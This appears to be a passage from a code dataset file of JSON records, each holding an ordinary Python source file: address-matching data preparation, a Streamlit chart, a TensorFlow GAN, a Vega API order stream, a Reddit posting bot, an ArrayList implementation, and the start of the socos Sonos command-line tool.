+{"seq_id":"312870773","text":"#!coding=utf8\nimport xlrd\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport sys\n#import xlrd\n#import jsonload\n#from jsonload import get_kv,loadFont,cal_dis\nfrom function_ultra import utils\nfrom function_ultra.mylog import logger\nimport time\nimport codecs\n\nlogger.debug(\"> start mark\")\nlabelmap = {}\nlabelmap[\"B\"] = 0\nlabelmap[\"I\"] = 1\nlabelmap[\"O\"] = 2\nlabelmap[\"S\"] = 3\n\ndef cost_matrix_value(cost):\n row_ind,col_ind=linear_sum_assignment(cost)\n #print(row_ind)#开销矩阵对应的行索引\n #print(col_ind)#对应行索引的最优指派的列索引\n #print(cost[row_ind,col_ind])#提取每个行索引的最优指派列索引所在的元素,形成数组\n #print(cost[row_ind,col_ind].sum())#数组求和\n return cost[row_ind,col_ind].sum(),row_ind,col_ind\n#for i,j in zip(row_ind, col_ind):\n# print(cost[i,j])\n\n\ndef matrix_build_extract(contl,contr,dct=None,weight=0):\n #ichar_num = [\"一\",\"二\",\"三\",\"四\",\"五\",\"六\",\"七\",\"八\",\"九\",\"零\"]\n #ichar_num.extend([\"栋\",\"单元\",\"层\",\"号\",\"室\",\"户\"])\n ichar_num = [\" \"]\n #pdb.set_trace()\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n #mulby= (len(contl)-len(contr))**2\n #mulby+=2\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n #if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n # mat[i][j]=0\n #if contl[i] in ichar_num or contr[j] in ichar_num:\n # mulby=0\n # mulby=0\n #if False:\n # pass\n #pdb.set_trace()\n #mat[i][j]=(1/len(contl))\n # mat[i][j]=0\n if contl[i]==contr[j]:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n #mat[i][j]=1*mulby\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n #mat[i][j]=(lr*ll*mulby)\n #mat[i][j]=np.log(10+(lr*ll*mulby))\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef matrix_build(contl,contr,dct=None,weight=0):\n ichar_num = [\" \"]\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef hugry_match(mat,k1s,k2s):\n s,r,c = cost_matrix_value(mat)\n data = []\n label = []\n match = []\n for i,j in zip(r,c):\n if k1s[i]==k2s[j]:\n match.append(j)\n else:\n pass\n for i in range(len(k2s)):\n if i in match:\n data.append(k2s[i])\n label.append(labelmap[\"I\"])\n else:\n data.append(k2s[i])\n label.append(labelmap[\"O\"])\n return data,label,s,r,c\n\ndef read_txt(filename,shuffle):\n lines = codecs.open(filename,\"r\",\"utf-8\").readlines()\n for line in lines:\n if shuffle:\n line = lines[np.random.randint(len(lines))]\n line = line.split(\"&\")[0]\n line = utils.clr(line)\n yield line\n\n'''\ndef mark_from_txt_compare(filename):\n gen = read_txt(filename)\n _gen = read_txt(filename)\n for i in gen:\n for j in _gen:\n if i == j:\n continue\n elif len(i)>len(j):\n data, label,s,r,c = hugry_match(matrix_build(i,j),i,j)\n yield (data,label)\n else:\n data, label,s,r,c = hugry_match(matrix_build(j,i),j,i)\n yield (data,label)\n'''\ndef show_match(filename):\n cnt = 100\n with open(\"match_sample.txt\",\"r\") as f:\n lines = f.readlines()\n for line in lines:\n kv = line.split(\"\\t\")\n pas = \"\"\n for i,j in zip(kv[0],kv[1]):\n if j == \"1\":\n pas+=i\n else:\n pas+=\"_\"\n cnt-=1\n if cnt<0:\n time.sleep(0.2)\n cnt=100\n\ndef read_xlrd(filename):\n ad = xlrd.open_workbook(filename)\n sts = ad.sheets()\n rows = sts[0].get_rows()\n result = []\n for line in rows:\n k = line[14].value\n v = line[10].value\n k = utils.clr(k)\n v = utils.clr(v)\n data,label,s,r,c= hugry_match(matrix_build(k,v),k,v)\n yield (data,label,k,v)\n\ndef addr_classifier(k,v,dct,direct):\n data,label,s,r,c= hugry_match(matrix_build(k,v,dct,direct),k,v)\n return data,label,s,r,c\n\ndef init_ner_train_data(filename):\n gen = read_txt(filename,shuffle=True)\n f = open(filename,\"a+\")\n for sent in gen:\n sent = utils.clr(sent)\n for char in sent:\n f.write(\"%s O\\n\"%char)\n f.write(\"\\n\")\n f.close()\n\ndef sent_pair_gen(filename):\n with open(filename, \"a+\") as gh:\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n for i in gen:\n k = i[2]\n v = i[3]\n gh.write(\"%s %s\\n\"%(k,v))\n gh.flush()\nimport re\n\ndef seperate_zhengz_address(filename):\n rt = open(\"/home/dell/data/zhengz_train.txt\",\"w+\")\n wx = open(\"/home/dell/data/zhengz_dev.txt\",\"w+\")\n tmp = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n line = re.sub(\"NONE\",\"\",line)\n line = re.sub(\" \",\"\",line)\n line = utils.clr(line)\n if 'ROOT' in line:\n qua,ans = line.split('ROOT')\n rt.write(\"%s %s 0\\n\"%(qua,ans))\n else:\n if len(tmp) == 2:\n rt.write(\"%s %s 1\\n\"%(tmp[0],tmp[1]))\n tmp = []\n else:\n tmp.append(line)\n rt.close()\n wx.close()\n\n\ndef zhengz_train_data_gen_sent_pairs():\n standf = '/home/dell/data/zz_std_words.txt'\n samplef = '/home/dell/data/eval_zz.txt'\n filename = \"/home/dell/data/zhengz_comp.txt\"\n stand = read_txt(standf,shuffle=True)\n sampl = read_txt(samplef,shuffle=True)\n cont = open(filename,\"w+\")\n index = 0\n for lstd in stand:\n for lsam in sampl:\n cont.write('%s %s\\n'%(lstd,lsam))\n index+=1\n if index>1000000:\n break\n stand.close()\n sampl.close()\n cont.close()\n\ndef train_data_gen_sent_pairs(filename,writeintrain,writeintest):\n with open(writeintrain,\"w+\") as g:\n with open(writeintest,\"w+\") as h:\n with open(filename,\"r\") as f:\n lines = f.readlines()\n sep = int(len(lines)*0.9//1)\n for line in lines[:sep]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = line.split(\" \")\n g.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n for line in lines[sep:]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = line.split(\" \")\n h.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n\n\nif __name__ == \"__main__\":\n #sent_pair_gen(\"./sent_pair_word.txt\")\n #zhengz_train_data_gen_sent_pairs()\n #pdb.set_trace()\n #seperate_zhengz_address(\"/home/dell/data/output_zz.txt\")\n\n #train_data_gen_sent_pairs(\"/home/dell/data/sent_pair_word.txt\",\"/home/dell/data/example_train_sentpair_zhongtianhuayuan\", \\\n #\"/home/dell/data/example_test_sentpair_zhongtianhuayuan\")\n #gen = read_xlrd(\"data/addr_guiyang_zhongtian_huayuan.xlsx\")\n #for i in gen:\n # print(i)\n #filename = sys.argv[1]\n #init_ner_train_data(filename)\n with open(\"match_sample_reverse.txt\",\"a+\") as gh:\n #gen = mark_from_txt_compare(\"/data/network_zz/output/doc_pre_handle.txt\")\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n print(gen)\n for i in gen:\n print(i)\n k = \"\".join(i[0])\n v = \"\".join([str(_) for _ in i[1]])\n for ii,jj in zip(k,v):\n gh.write(\"%s %s\\n\"%(ii,jj))\n gh.write(\"\\n\")\n gh.flush()\n #if \"1\" in \"\".join([str(_) for _ in i[1]]):\n # pdb.set_trace()\n\n","sub_path":"yunyan_baotou/src/business_ultra/mark_train_data.py","file_name":"mark_train_data.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355489025","text":"\"\"\"\nDisplay graphs of the data\n\"\"\"\n\nimport streamlit as st\nfrom facebook.data.fetch_from_api import get_fb_posts\n\n\ndef display_facebook():\n \"\"\"\n Display Facebook posts data\n \"\"\"\n fb_posts = get_fb_posts()\n st.header(\"Facebook posts\")\n st.write(fb_posts)\n st.subheader(\"Total likes\")\n st.line_chart(data=fb_posts['statistics.actual.likeCount'])\n","sub_path":"facebook/visualizations/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94995609","text":"from functools import partial\nimport tensorflow as tf\nimport neural_nets.nn as nn\n\nclass SimpleGan:\n\n def __init__(self,\n crop_size=100,\n lr=.0001,\n wasserstein=False):\n\n #\"\"\" graph \"\"\"\n # resnet_model\n self.generator = partial(nn.generator, scope='generator')\n self.discriminator = partial(nn.discriminator, scope='discriminator')\n\n\n # Placeholders\n self.real = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n self.noise = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n\n # Generator outputs\n self.generator_output = self.generator(self.noise)\n\n # Discriminator outputs\n self.discriminator_output_real = self.discriminator(self.real)\n self.discriminator_output_fake = self.discriminator(self.generator_output)\n\n if wasserstein:\n self.d_loss = tf.reduce_mean(self.discriminator_output_fake) - tf.reduce_mean(self.discriminator_output_real)\n self.g_loss = -tf.reduce_mean(self.discriminator_output_fake)\n\n else:\n # Generator loss\n self.g_loss = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.ones_like(self.discriminator_output_fake))\n\n # Discriminator loss\n self.d_loss_real = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_real, multi_class_labels=tf.ones_like(self.discriminator_output_real))\n self.d_loss_fake = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.zeros_like(self.discriminator_output_fake))\n self.d_loss = self.d_loss_real + self.d_loss_fake\n\n\n # Optimization\n t_var = tf.trainable_variables()\n d_var = [var for var in t_var if 'discriminator' in var.name]\n g_var = [var for var in t_var if 'generator' in var.name]\n\n self.d_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.d_loss, var_list=d_var)\n self.g_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.g_loss, var_list=g_var)\n\n\n # \"\"\" train \"\"\"\n # ''' init '''\n # session\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config)\n\n self.init_op = tf.global_variables_initializer()\n self.sess.run(self.init_op)\n\n #''' saver '''\n self.saver = tf.train.Saver(max_to_keep=None)","sub_path":"neural_nets/simple_gan.py","file_name":"simple_gan.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241422545","text":"#!/usr/bin/python3\n\n\"\"\"\nScript language: Python3\n\nTalks to:\n- Vega node (gRPC)\n\nApps/Libraries:\n- gRPC (node): Vega-API-client (https://pypi.org/project/Vega-API-client/)\n\"\"\"\n\n# Note: this file uses smart-tags in comments to section parts of the code to\n# show them as snippets in our documentation. They are not necessary to be\n# included when creating your own custom code.\n#\n# Example of smart-tags:\n# __something:\n# some code here\n# :something__\n\nimport os\nimport signal\nimport sys\n\n# __import_client:\nimport vegaapiclient as vac\n# :import_client__\n\nnode_url_grpc = os.getenv(\"NODE_URL_GRPC\")\n\ndef signal_handler(sig, frame):\n print('Exit requested.')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# __create_client:\n# Create a Vega gRPC data client\ndata_client = vac.VegaTradingDataClient(node_url_grpc)\n# :create_client__\n\n# __find_market:\n# Get a list of markets, and select the first market returned\nmarkets = data_client.Markets(vac.api.trading.MarketsRequest()).markets\nmarket_id = markets[0].id\n# :find_market__\n\n# __stream_orders:\n# Subscribe to the Orders stream for the marketID specified\n# Optional: Market identifier - filter by market\n# Party identifier - filter by party\n# By default, all orders on all markets for all parties will be returned on the stream.\nsubscribe_request = vac.api.trading.OrdersSubscribeRequest(market_id=market_id)\nfor stream_resp in data_client.OrdersSubscribe(subscribe_request):\n for order in stream_resp.orders:\n # All orders arriving over the channel/stream will be printed\n print(order)\n# :stream_orders__\n","sub_path":"stream-orders-and-trades/stream-orders-with-Vega-API-client.py","file_name":"stream-orders-with-Vega-API-client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"247570126","text":"import praw\r\nimport time\r\n\r\n\r\ndef main():\r\n posttopfifty()\r\n postlog()\r\n\r\ndef posttopfifty():\r\n topfifty = \"Post# | Title | Subreddit | Url | Upvotes \\n ---|---|---|----|---- \\n\"\r\n counter = 1\r\n for submission in reddit.subreddit('all').top('day', limit=50):\r\n topfifty += \"{} | {} | /r/{} | [link]({}) | {} \\n\".format(counter, submission.title, submission.subreddit,\r\n submission.url, submission.score)\r\n counter += 1\r\n reddit.subreddit('GraxPy').submit(time.strftime('%m/%d/%y'), topfifty)\r\n print('posted')\r\n\r\n\r\ndef postlog():\r\n f = open(r'C:\\Users\\Wilson\\desktop\\python.txt', 'w')\r\n f.write('Posted to reddit: {}\\n'.format(time.strftime('%x %X')))\r\n f.close()\r\n\r\nif __name__ == '__main__':\r\n reddit = praw.Reddit('bot')\r\n main()\r\n","sub_path":"GraxPyPost.py","file_name":"GraxPyPost.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463772432","text":"# An ArrayList is one of\r\n# - None\r\n# - ArrayList(array, int, int)\r\nclass ArrayList:\r\n def __init__(self, array, size, capacity=10):\r\n if array == [None] or array is None:\r\n self.array = [None] * capacity\r\n else:\r\n self.array = array\r\n self.size = size\r\n self.capacity = capacity\r\n\r\n def __eq__(self, other):\r\n return ((type(other) == ArrayList)\r\n and self.array == other.array\r\n and self.size == other.size\r\n and self.capacity == other.capacity\r\n )\r\n\r\n def __repr__(self):\r\n return \"ArrayList({!r}, {!r}, {!r})\".format(self.array, self.size, self.capacity)\r\n\r\n\r\n# None -> ArrayList\r\n# Returns an empty ArrayList\r\ndef empty_list():\r\n return ArrayList([None], 0)\r\n\r\n\r\n# ArrayList int value -> ArrayList\r\n# Takes an ArrayList, an index, and a value, places the value at the given index in the list, and returns it\r\ndef add(array, index, value):\r\n if array.size == array.capacity:\r\n array = double_capacity(array)\r\n\r\n if index > array.size or index < 0:\r\n raise IndexError\r\n else:\r\n for i in range(array.size - 1, index - 1, -1):\r\n array.array[i + 1] = array.array[i]\r\n array.array[index] = value\r\n array.size += 1\r\n return array\r\n\r\n\r\n# ArrayList -> ArrayList\r\n# Doubles the capacity of an ArrayList\r\ndef double_capacity(array):\r\n double = ArrayList([None], array.size, array.capacity * 2)\r\n for i in range(array.size):\r\n double.array[i] = array.array[i]\r\n return double\r\n\r\n\r\n# ArrayList -> int\r\n# Takes an ArrayList and returns the number of elements in the list\r\ndef length(array):\r\n return array.size\r\n\r\n\r\n# ArrayList int -> value\r\n# Takes an ArrayList and an index and returns the value at the given index\r\ndef get(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n return array.array[index]\r\n\r\n\r\n# ArrayList int value -> AnyList\r\n# Takes an ArrayList, an index, and a value and replaces the element at the index in the list with the given value\r\ndef set(array, index, value):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n array.array[index] = value\r\n return array\r\n\r\n\r\n# ArrayList int -> (value, ArrayList)\r\n# Takes an ArrayList and an index and removes the element at the index, returning the removed element and resulting list\r\ndef remove(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n num = array.array[index]\r\n for i in range(index + 1, array.size):\r\n array.array[i - 1] = array.array[i]\r\n array.array[array.size - 1] = None\r\n array.size -= 1\r\n return num, array\r\n","sub_path":"Projects/project-3-gmonteir/array_list.py","file_name":"array_list.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"309102035","text":"#!/usr/bin/env python\n\n\"\"\" socos is a commandline tool for controlling Sonos speakers \"\"\"\n\nfrom __future__ import print_function\n\n\n# Will be parsed by setup.py to determine package metadata\n__author__ = 'SoCo team '\n__version__ = '0.1'\n__website__ = 'https://github.com/SoCo/socos'\n__license__ = 'MIT License'\n\n\nimport sys\nimport os\nfrom collections import OrderedDict\nimport sqlite3\nimport json\nimport shlex\n\ntry:\n # pylint: disable=import-error\n import colorama\nexcept ImportError:\n # pylint: disable=invalid-name\n colorama = None\n\ntry:\n import readline\nexcept ImportError:\n # pylint: disable=invalid-name\n readline = None\n\ntry:\n # pylint: disable=redefined-builtin,invalid-name,undefined-variable\n input = raw_input\nexcept NameError:\n # raw_input has been renamed to input in Python 3\n pass\n\nimport soco\nfrom soco.data_structures import MLTrack, MLAlbum, MLArtist, MLPlaylist\n\n\nclass MusicLibrary(object):\n \"\"\"Class that implements the music library support for socos\"\"\"\n\n def __init__(self):\n # Sqlite3 variables\n self.connection = None\n self.cursor = None\n # As a simple opitmization we cache 10 searches\n self.cached_searches = OrderedDict()\n self.cache_length = 10\n # Date type and tables names\n self.data_types = ['playlists', 'artists', 'albums', 'tracks']\n\n def _open_db(self):\n \"\"\"Open a connection to the sqlite3 database and if necessary create\n the the folders and path for it. The file will be saved to:\n USERPATH/.config/socos/musiclib.db where USERPATH is as returned by\n os.path.expanduser\n \"\"\"\n if not self.connection:\n userdir = os.path.expanduser('~')\n dbdir = os.path.join(userdir, '.config', 'socos')\n if not os.path.exists(dbdir):\n os.makedirs(dbdir)\n yield 'Created folder: \\'{}\\''.format(dbdir)\n\n dbpath = os.path.join(dbdir, 'musiclib.db')\n if not os.path.exists(dbpath):\n yield 'Created Sqlite3 database for music library '\\\n 'information at: \\'{}\\''.format(dbpath)\n self.connection = sqlite3.connect(dbpath)\n self.cursor = self.connection.cursor()\n\n def index(self, sonos):\n \"\"\"Update the index of the music library information\"\"\"\n for string in self._open_db():\n yield string\n # Drop old tables\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n number_of_tables = len(self.cursor.fetchall())\n if number_of_tables == 4:\n yield 'Deleting tables'\n query = 'DROP TABLE {}'\n for table_name in self.data_types:\n self.cursor.execute(query.format(table_name))\n self.connection.commit()\n\n # Form new tables\n yield 'Creating tables'\n create_statements = [\n 'CREATE TABLE tracks (title text, album text, artist text, '\n 'content text)',\n 'CREATE TABLE albums (title text, artist text, content text)',\n 'CREATE TABLE artists (title text, content text)',\n 'CREATE TABLE playlists (title text, content text)',\n ]\n for create in create_statements:\n self.cursor.execute(create)\n self.connection.commit()\n\n # Index the 4 different types of data\n for data_type in self.data_types:\n for string in self._index_single_type(sonos, data_type):\n yield string\n\n def _index_single_type(self, sonos, data_type):\n \"\"\"Index a single type if data\"\"\"\n fields = self._get_columns(data_type)\n # Artist is called creator in the UPnP data structures\n if 'artist' in fields:\n fields[fields.index('artist')] = 'creator'\n\n # E.g: INSERT INTO tracks VALUES (?,?,?,?)\n query = 'INSERT INTO {} VALUES ({})'.format(\n data_type, ','.join(['?'] * len(fields)))\n\n # For brevity\n get_ml_inf = sonos.get_music_library_information\n\n total = get_ml_inf(data_type, 0, 1)['total_matches']\n yield 'Adding: {}'.format(data_type)\n count = 0\n while count < total:\n # Get as many matches as the device will give each time\n search = get_ml_inf(data_type, start=count, max_items=1000)\n for item in search['item_list']:\n # In the database we save a set of text fields and the content\n # dict as json. See self.index for details on fields.\n values = [getattr(item, field) for field in\n fields[:-1]]\n values.append(json.dumps(item.to_dict))\n self.cursor.execute(query, values)\n self.connection.commit()\n\n # Print out status while running because indexing tracks can take a\n # while\n count += search['number_returned']\n yield '{{: >3}}% {{: >{0}}} out of {{: >{0}}}'\\\n .format(len(str(total)))\\\n .format(count * 100 / total, count, total)\n\n def _get_columns(self, table):\n \"\"\"Return the names of the columns in the table\"\"\"\n query = 'PRAGMA table_info({})'.format(table)\n self.cursor.execute(query)\n # The table descriptions look like: (0, u'title', u'text', 0, None, 0)\n return [element[1] for element in self.cursor.fetchall()]\n\n def tracks(self, sonos, *args):\n \"\"\"Search for and possibly play tracks from the music library\n\n Usage: ml_tracks [field=]text [action] [number]\n\n Field can be 'title', 'album' or 'artist'. If field is not given, then\n 'title' is used. Only a single word can be used as search text. Action\n can be 'add' or 'replace' and number refers to the item number in the\n search results.\n\n Examples:\n ml_tracks artist=metallica\n ml_tracks unforgiven\n ml_tracks unforgiven add 4\n \"\"\"\n for string in self._search_and_play(sonos, 'tracks', *args):\n yield string\n\n def albums(self, sonos, *args):\n \"\"\"Search for and possibly play albums from the music library\n\n Usage: ml_albums [field=]text [action] [number]\n\n Field can be 'title' or 'artist'. If field is not given, then 'title'\n is used. Only a single word can be used as search text. Action can be\n 'add' or 'replace' and number refers to the item number in the search\n results.\n\n Examples:\n ml_albums artist=metallica\n ml_albums black\n ml_albums black add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'albums', *args):\n yield string\n\n def artists(self, sonos, *args):\n \"\"\"Search for and possibly play all by artists from music library\n\n Usage: ml_artists text [action] [number]\n\n 'text' is searched for in the artist titles. Only a single word can '\\\n 'be used as search text. Action can be 'add' or 'replace' and number '\\\n 'refers to the item number in the search results.\n\n Examples:\n ml_artists metallica\n ml_artists metallica add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'artists', *args):\n yield string\n\n def playlists(self, sonos, *args):\n \"\"\"Search for and possibly play playlists imported in the music library\n\n Usage: ml_playlists text [action] [number]\n\n 'text' is searched for in the playlist titles. Only a single word '\\\n 'can be used as search text. Action can be 'add' or 'replace' and '\\\n 'number refers to the item number in the search results.\n\n Examples:\n ml_playlist metallica\n ml_playlist metallica add 3\n \"\"\"\n for string in self._search_and_play(sonos, 'playlists', *args):\n yield string\n\n def _search_and_play(self, sonos, data_type, *args):\n \"\"\"Perform a music library search and possibly play and item\"\"\"\n # Open the data base\n for string in self._open_db():\n yield string\n\n # Check if the music library has been indexed\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n if len(self.cursor.fetchall()) != 4:\n message = 'Your music library cannot be search until it has been '\\\n 'indexed. First run \\'ml_index\\''\n raise TypeError(message)\n # Check if there is a search term\n if len(args) < 1:\n message = 'Search term missing. See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n # And finally perform the search\n results = self._search(data_type, *args)\n\n # If there are no other arguments then the search\n if len(args) == 1:\n for string in self._print_results(data_type, results):\n yield string\n # Or if there are the right number for a play command\n elif len(args) == 3:\n yield self._play(sonos, data_type, results, *args)\n # Else give error\n else:\n message = 'Incorrect play syntax: See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n def _search(self, data_type, *args):\n \"\"\"Perform the search\"\"\"\n # Process search term\n search_string = args[0]\n if search_string.count('=') == 0:\n field = 'title'\n search = search_string\n elif search_string.count('=') == 1:\n field, search = search_string.split('=')\n else:\n message = '= signs are not allowed in the search string'\n raise TypeError(message)\n\n # Pad the search term with SQL LIKE wild cards\n search = search.join(['%', '%'])\n # Do the search, if it has not been cached\n if (data_type, field, search) in self.cached_searches:\n results = self.cached_searches[(data_type, field, search)]\n else:\n if field in self._get_columns(data_type)[:-1]:\n # Perform the search in Sqlite3\n query = 'SELECT * FROM {} WHERE {} LIKE ?'.format(data_type,\n field)\n try:\n search = search.decode('utf-8')\n except AttributeError:\n pass\n self.cursor.execute(query, [search])\n results = self.cursor.fetchall()\n # Add results to the cache and reduce cache length if necesary\n self.cached_searches[(data_type, field, search)] = results\n while len(self.cached_searches) > self.cache_length:\n self.cached_searches.popitem(last=False)\n else:\n message = 'The search field \\'{}\\' is unknown. Only {} is '\\\n 'allowed'.format(field, self._get_columns(data_type)[:-1])\n raise TypeError(message)\n return results\n\n @staticmethod\n def _play(sonos, data_type, results, *args):\n \"\"\"Play music library item from search\"\"\"\n action, number = args[1:]\n # Check action\n if action not in ['add', 'replace']:\n message = 'Action must be \\'add\\' or \\'replace\\''\n raise TypeError(message)\n\n # Convert and check number\n try:\n number = int(number) - 1\n except ValueError:\n raise TypeError('Play number must be parseable as integer')\n if number not in range(len(results)):\n if len(results) == 0:\n message = 'No results to play from'\n elif len(results) == 1:\n message = 'Play number can only be 1'\n else:\n message = 'Play number has to be in the range from 1 to {}'.\\\n format(len(results))\n raise TypeError(message)\n\n # The last item in the search is the content dict in json\n item_dict = json.loads(results[number][-1])\n ml_classes = {'tracks': MLTrack, 'albums': MLAlbum,\n 'artists': MLArtist, 'playlists': MLPlaylist}\n item = ml_classes[data_type].from_dict(item_dict)\n\n # Save state before queue manipulation\n player_state = state(sonos)\n out = 'Added to queue: \\'{}\\''\n if action == 'replace':\n sonos.clear_queue()\n out = 'Queue replaced with: \\'{}\\''\n sonos.add_to_queue(item)\n if action == 'replace' and player_state == 'PLAYING':\n sonos.play()\n\n title = item.title\n if hasattr(title, 'decode'):\n title = title.encode('utf-8')\n return out.format(title)\n\n @staticmethod\n def _print_results(data_type, results):\n \"\"\"Print the results out nicely\"\"\"\n print_patterns = {\n u'tracks': '\\'{title}\\' on \\'{album}\\' by \\'{creator}\\'',\n u'albums': '\\'{title}\\' by \\'{creator}\\'',\n u'artists': '\\'{title}\\'',\n u'playlists': '\\'{title}\\''\n }\n # Length of the results length number\n index_length = len(str(len(results)))\n for index, item in enumerate(results):\n item_dict = json.loads(item[-1])\n for key, value in item_dict.items():\n if hasattr(value, 'decode'):\n item_dict[key] = value.encode('utf-8')\n number = '({{: >{}}}) '.format(index_length).format(index + 1)\n # pylint: disable=star-args\n yield number + print_patterns[data_type].format(**item_dict)\n\n\n# current speaker (used only in interactive mode)\nCUR_SPEAKER = None\n# Instance of music library class\nMUSIC_LIB = MusicLibrary()\n\n\ndef main():\n \"\"\" main switches between (non-)interactive mode \"\"\"\n args = sys.argv[1:]\n\n if args:\n # process command and exit\n process_cmd(args)\n else:\n # start interactive shell\n shell()\n\n\ndef process_cmd(args):\n \"\"\" Processes a single command \"\"\"\n\n cmd = args.pop(0).lower()\n\n if cmd not in COMMANDS:\n err('Unknown command \"{cmd}\"'.format(cmd=cmd))\n err(get_help())\n return False\n\n func, args = _check_args(cmd, args)\n\n try:\n result = _call_func(func, args)\n except TypeError as ex:\n err(ex)\n return\n\n # colorama.init() takes over stdout/stderr to give cross-platform colors\n if colorama:\n colorama.init()\n\n # process output\n if result is None:\n pass\n\n elif hasattr(result, '__iter__'):\n try:\n for line in result:\n print(line)\n except TypeError as ex:\n err(ex)\n return\n\n else:\n print(result)\n\n # Release stdout/stderr from colorama\n if colorama:\n colorama.deinit()\n\n\ndef _call_func(func, args):\n \"\"\" handles str-based functions and calls appropriately \"\"\"\n\n # determine how to call function\n if isinstance(func, str):\n sonos = args.pop(0)\n method = getattr(sonos, func)\n return method(*args) # pylint: disable=star-args\n\n else:\n return func(*args) # pylint: disable=star-args\n\n\ndef _check_args(cmd, args):\n \"\"\" checks if func is called for a speaker and updates 'args' \"\"\"\n\n req_ip, func = COMMANDS[cmd]\n\n if not req_ip:\n return func, args\n\n if not CUR_SPEAKER:\n if not args:\n err('Please specify a speaker IP for \"{cmd}\".'.format(cmd=cmd))\n return None, None\n else:\n speaker_spec = args.pop(0)\n sonos = soco.SoCo(speaker_spec)\n args.insert(0, sonos)\n else:\n args.insert(0, CUR_SPEAKER)\n\n return func, args\n\n\ndef shell():\n \"\"\" Start an interactive shell \"\"\"\n\n if readline is not None:\n readline.parse_and_bind('tab: complete')\n readline.set_completer(complete_command)\n readline.set_completer_delims(' ')\n\n while True:\n try:\n # Not sure why this is necessary, as there is a player_name attr\n # pylint: disable=no-member\n if CUR_SPEAKER:\n line = input('socos({speaker}|{state})> '.format(\n speaker=CUR_SPEAKER.player_name,\n state=state(CUR_SPEAKER).title()).encode('utf-8'))\n else:\n line = input('socos> ')\n except EOFError:\n print('')\n break\n except KeyboardInterrupt:\n print('')\n continue\n\n line = line.strip()\n if not line:\n continue\n\n try:\n args = shlex.split(line)\n except ValueError as value_error:\n err('Syntax error: %(error)s' % {'error': value_error})\n continue\n\n try:\n process_cmd(args)\n except KeyboardInterrupt:\n err('Keyboard 